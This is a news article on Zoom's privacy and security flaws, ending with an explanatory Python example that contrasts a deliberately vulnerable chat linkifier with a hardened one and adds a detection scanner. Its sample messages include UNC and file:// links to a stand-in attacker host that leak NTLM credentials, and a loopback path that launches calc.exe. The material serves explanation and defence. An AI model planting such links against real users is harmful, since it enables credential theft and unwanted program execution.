Earlier this week, the Zoom video conferencing application was already at the center of a scandal when it emerged that it was sending data about its users to Facebook. The developers then said this had been a mistake, that they had not been aware of this behavior of the Facebook SDK, and hastily removed it (which, however, did not save the company from at least one class action lawsuit).
Zoom's popularity is currently growing rapidly because of the COVID-19 pandemic, as more and more people find themselves in isolation and have to work and communicate exclusively remotely. The company's share price has also risen sharply against this background.
In recent weeks, Zoom has been criticized by many IT publications. For example, Vice Motherboard recently reviewed the video conferencing solutions on the market and found that Zoom video calls are not end-to-end encrypted by default, and that the application offers creepy features such as attention tracking. With this function, the host can monitor participants' attention and detect when someone has had a window other than the active Zoom window in focus for more than half a minute.
“Zoom is an advertising business in its worst form: one that lives off of the collected personal data. Even more creepy is the fact that Zoom can collect a large amount of data, some of which is very personal (for example, a psychologist's conversation with a patient),” the specialist wrote. “Zoom does not have to participate in the advertising business, especially in the part that lives like a vampire on the blood of human data. If Zoom needs more money, it needs to charge more for its services or give less for free.”
EFF experts also warned that Zoom hosts can monitor participants' activity during screen sharing, and that administrators can see “how, when and where users use Zoom,” as well as access the contents of recorded calls, including “video, audio, transcript and chat files.”
However, the complaints are not limited to user privacy.
For example, Zoom already made the news with last year's vulnerability. Back then, when installed on macOS, the application set up a local web server with an undocumented API on the user's machine, and this server stayed in the system and kept running even after the application itself had been uninstalled. As a result, any website the user visited could interact with that web server. This made it possible to start video calls, join the user to other people's calls, and even silently update or reinstall the application itself (without any confirmation from the victim). The web server could also be used for DoS attacks: a stream of simple requests to it was enough.
Now Bleeping Computer warns that the Zoom client for Windows can leak the user's Windows credentials through UNC links.
When using Zoom, conference participants can send each other text messages through the chat interface. Any URL sent this way is converted into a hyperlink so that other participants can click it and open it in their default browser.
The problem, as a researcher known as g0dmode found, is that the Zoom Windows client also converts UNC paths (Windows network paths of the form \\server\share\file) into clickable links.
The publication explains that if a user clicks such a UNC link (in its example, a path to a remote cat.jpg), Windows will try to connect to the remote host over the SMB protocol to open the file. In doing so, Windows by default sends the user's login name together with an NTLM authentication response (the "NTLM hash"); an attacker who controls that host can capture it and then crack it offline with tools such as Hashcat.
It is also noted that the same UNC injection can be used to launch programs on the victim's own computer: for example, a link to \\127.0.0.1\C$\windows\system32\calc.exe launches the calculator.
Researchers have already notified Zoom's developers and point out that UNC paths simply should not be turned into clickable links. The problem has not yet been fixed, so the Bleeping Computer article includes detailed instructions for reducing the risk (so that NTLM credentials are not sent to remote servers). In short, the recommended mitigation is the Windows security policy “Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers” set to “Deny all” (the RestrictSendingNTLMTraffic value under HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0 in the registry). Note that this can break access to SMB shares that rely on NTLM authentication, and that blocking outbound TCP port 445 at the network perimeter stops the credential leak to internet hosts but does nothing against the loopback trick above.
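To make the bug and its fix concrete, here is an added example in Python (not Zoom's code, and not taken from the Bleeping Computer article): a toy chat linkifier that reproduces the vulnerable behaviour of turning UNC paths into clickable links, a hardened version that only linkifies http(s) URLs, and a small scanner that lists which SMB host each message would make Windows contact. All chat lines and host names (attacker.example, example.com) are constructed for the example.

```python
"""Added example: chat linkification, vulnerable vs. hardened (not Zoom's code)."""
import re
from urllib.parse import urlsplit

# Constructed sample chat lines; the hosts and paths are made up for this example.
SAMPLE_MESSAGES = [
    "Slides are at https://example.com/deck.pdf",
    r"cute one: \\attacker.example\images\cat.jpg",        # remote UNC -> NTLM leak
    r"\\127.0.0.1\C$\windows\system32\calc.exe",            # loopback UNC -> runs calc
    "also file://attacker.example/share/doc.docx",          # file: URL with a host
    "plain text with no links",
]

# Two backslashes, a host, a backslash, then a non-space path: \\host\share\...
UNC_RE = re.compile(r"\\\\[^\\\s]+\\[^\s]+")
# Anything with a scheme and "://", e.g. https://..., file://..., smb://...
URL_RE = re.compile(r"\b[a-zA-Z][a-zA-Z0-9+.-]*://[^\s]+")
SAFE_SCHEMES = {"http", "https"}
# HTML escaping is left out on purpose to keep the example focused on the link rule.


def linkify_vulnerable(text):
    """Reproduces the bug: URLs *and* UNC paths become <a> tags.

    Returns (html, hrefs). A click on a file://host/... href makes Windows open
    the path over SMB and send the user's NTLM authentication to that host.
    """
    hrefs = []

    def url_sub(m):
        hrefs.append(m.group(0))
        return f'<a href="{m.group(0)}">{m.group(0)}</a>'

    def unc_sub(m):
        href = "file:" + m.group(0).replace("\\", "/")  # \\host\share -> file://host/share
        hrefs.append(href)
        return f'<a href="{href}">{m.group(0)}</a>'

    html = URL_RE.sub(url_sub, text)
    html = UNC_RE.sub(unc_sub, html)
    return html, hrefs


def linkify_hardened(text):
    """Fix: only http(s) URLs become links; UNC paths and file:/smb: URLs stay plain text."""
    hrefs = []

    def url_sub(m):
        url = m.group(0)
        if urlsplit(url).scheme.lower() not in SAFE_SCHEMES:
            return url  # not clickable
        hrefs.append(url)
        return f'<a href="{url}">{url}</a>'

    # UNC_RE is deliberately not applied here, so \\host\share\... is never linkified.
    return URL_RE.sub(url_sub, text), hrefs


def unc_targets(text):
    """Detection view: hosts that a UNC path or file:/smb: link in `text` would make
    Windows contact over SMB if it were clicked."""
    hosts = [m.group(1) for m in re.finditer(r"\\\\([^\\\s]+)\\", text)]
    for m in URL_RE.finditer(text):
        parts = urlsplit(m.group(0))
        if parts.scheme.lower() in {"file", "smb"} and parts.hostname:
            hosts.append(parts.hostname)
    return hosts


def flag_unc_messages(messages):
    """(message index, SMB target host) for every message carrying such a link."""
    return [(i, host) for i, msg in enumerate(messages) for host in unc_targets(msg)]


if __name__ == "__main__":
    for msg in SAMPLE_MESSAGES:
        print("vulnerable:", linkify_vulnerable(msg)[1])
        print("hardened:  ", linkify_hardened(msg)[1])
    print("messages that would trigger SMB:", flag_unc_messages(SAMPLE_MESSAGES))
```

The scanner is the same logic a chat-moderation or DLP hook could run on incoming messages; a loopback target such as 127.0.0.1 is worth flagging separately, since it does not leak credentials to a remote host but can launch a local program.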
Although this problem may not seem all that significant, it is worth remembering that Zoom now holds about 20% of the market and is under close scrutiny from scammers and attackers of all stripes. For example, experts at Check Point warn that more than 1,700 new Zoom-related domains have been registered since the beginning of 2020, 25% of them in the past week alone. About 4% of these domains are considered by the experts to be highly suspicious.
The FBI also warned Zoom users about the dangers this week. Uninvited third parties are increasingly joining Zoom video conferences (online lessons and business meetings) to disrupt the meeting or play a prank, and then post recordings of it on social networks. For example, an unidentified person joined a remote class at a school in Massachusetts and showed swastika tattoos on camera. In another case, unknown persons interrupted a lesson and insulted the teacher.
The phenomenon has already been dubbed Zoom-bombing and is becoming increasingly widespread. Zoom users are strongly advised not to share meeting IDs (including their Personal Meeting IDs, PMIs) or join links publicly, to set passwords for all meetings, to use waiting rooms, and to keep the application up to date.